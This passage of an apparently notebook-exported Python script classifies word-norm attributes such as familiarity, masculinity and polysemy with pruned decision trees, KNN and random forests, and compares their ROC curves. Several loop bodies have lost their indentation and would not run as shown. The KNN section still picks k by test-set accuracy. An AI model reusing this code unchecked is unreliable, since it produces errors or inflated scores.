path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not dominant','dominant'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not familiar","familiar"],
feature_names=X.columns,
max_depth=3,
fontsize=7)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
plt.savefig('plot_of_tree.pdf')
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# Keep the Gini tree's ROC (from the current y_score) for the
# model-comparison plot at the end of this section.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:, 1])
roc_auc_0 = auc(fpr_0, tpr_0)

# --- Entropy criterion: same prune-and-evaluate pipeline. ---
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]

# 10-fold CV accuracy per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
# Fix: float() on a length-1 Series is deprecated in pandas >= 2.1 —
# use the scalar label from Series.idxmax.
best_row = alpha_results['mean_accuracy'].idxmax()
ideal_ccp_alpha = float(alpha_results.loc[best_row, 'alpha'])
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:, 1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))

# Visualize the pruned entropy tree (top 3 levels only).
plt.figure(figsize=(15, 7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
          filled=True,
          rounded=True,
          class_names=["not familiar", "familiar"],
          feature_names=X.columns,
          max_depth=3,
          fontsize=7)
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Random forest with 380 trees, trained on the training split. ---
model = RandomForestClassifier(n_estimators=380, random_state=42)
ra = model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:, 1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Overlay the ROC curves of all four models. ---
plt.figure(figsize=(8, 5))
plt.plot(fpr_0, tpr_0, lw=3, label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en, lw=3, label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN, lw=3, label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF, lw=3, label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Semsize"""
refvar="semsize"
taglio=0.63
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['small','big'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["small","big"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# Keep the Gini tree's ROC (from the current y_score) for the
# model-comparison plot at the end of this section.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:, 1])
roc_auc_0 = auc(fpr_0, tpr_0)

# --- Entropy criterion: same prune-and-evaluate pipeline. ---
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]

# 10-fold CV accuracy per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
# Fix: float() on a length-1 Series is deprecated in pandas >= 2.1 —
# use the scalar label from Series.idxmax.
best_row = alpha_results['mean_accuracy'].idxmax()
ideal_ccp_alpha = float(alpha_results.loc[best_row, 'alpha'])
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:, 1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Random forest with 380 trees, trained on the training split. ---
model = RandomForestClassifier(n_estimators=380, random_state=42)
ra = model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:, 1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Overlay the ROC curves of all four models. ---
plt.figure(figsize=(8, 5))
plt.plot(fpr_0, tpr_0, lw=3, label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en, lw=3, label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN, lw=3, label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF, lw=3, label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Masculinity"""
refvar="masculinity"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['feminine','masculine'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["feminine","masculine"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# Keep the Gini tree's ROC (from the current y_score) for the
# model-comparison plot at the end of this section.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:, 1])
roc_auc_0 = auc(fpr_0, tpr_0)

# --- Entropy criterion: same prune-and-evaluate pipeline. ---
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]

# 10-fold CV accuracy per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
# Fix: float() on a length-1 Series is deprecated in pandas >= 2.1 —
# use the scalar label from Series.idxmax.
best_row = alpha_results['mean_accuracy'].idxmax()
ideal_ccp_alpha = float(alpha_results.loc[best_row, 'alpha'])
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:, 1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Random forest with 380 trees, trained on the training split. ---
model = RandomForestClassifier(n_estimators=380, random_state=42)
ra = model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:, 1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Overlay the ROC curves of all four models. ---
plt.figure(figsize=(8, 5))
plt.plot(fpr_0, tpr_0, lw=3, label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en, lw=3, label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN, lw=3, label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF, lw=3, label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy"""
refvar="polysemy"
taglio=0.63
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not pol','pol'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not pol","pol"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
# Keep the Gini tree's ROC (from the current y_score) for the
# model-comparison plot at the end of this section.
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:, 1])
roc_auc_0 = auc(fpr_0, tpr_0)

# --- Entropy criterion: same prune-and-evaluate pipeline. ---
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]  # drop the trivial single-node alpha
clf_dts = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', random_state=0, ccp_alpha=ccp_alpha)
    clf_dt.fit(X_train, y_train)
    clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]

# 10-fold CV accuracy per alpha.
alpha_loop_values = []
for ccp_alpha in ccp_alphas:
    clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=0, ccp_alpha=ccp_alpha)
    scores = cross_val_score(clf_dt, X_train, y_train, cv=10)
    alpha_loop_values.append([ccp_alpha, np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
                             columns=['alpha', 'mean_accuracy', 'std'])
# Fix: float() on a length-1 Series is deprecated in pandas >= 2.1 —
# use the scalar label from Series.idxmax.
best_row = alpha_results['mean_accuracy'].idxmax()
ideal_ccp_alpha = float(alpha_results.loc[best_row, 'alpha'])
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1, random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:, 1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
# --- KNN: search k = 1..39 for the best test accuracy. Will take some time. ---
acc = []
for k in range(1, 40):
    neigh = KNeighborsClassifier(n_neighbors=k).fit(X_train, y_train)
    acc.append(metrics.accuracy_score(y_test, neigh.predict(X_test)))
# Bug fix: acc[j] holds the score for n_neighbors = j + 1, so add 1 back.
# The old acc.index(max(acc)) was off by one and could even request
# n_neighbors=0, which scikit-learn rejects.
best_k = acc.index(max(acc)) + 1
clf_knn = KNeighborsClassifier(n_neighbors=best_k)
# Bug fix: fit on the training split only; fitting on the full (X, y)
# leaked the test set into the model and inflated the reported scores.
clf_knn.fit(X_train, y_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:, 1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Random forest with 380 trees, trained on the training split. ---
model = RandomForestClassifier(n_estimators=380, random_state=42)
ra = model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:, 1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))

# --- Overlay the ROC curves of all four models. ---
plt.figure(figsize=(8, 5))
plt.plot(fpr_0, tpr_0, lw=3, label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en, lw=3, label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN, lw=3, label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF, lw=3, label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0, 1], [0, 1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Perceivability"""
refvar="perceivability"
taglio=0.8
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# --- Decision tree (Gini) with cost-complexity pruning ---
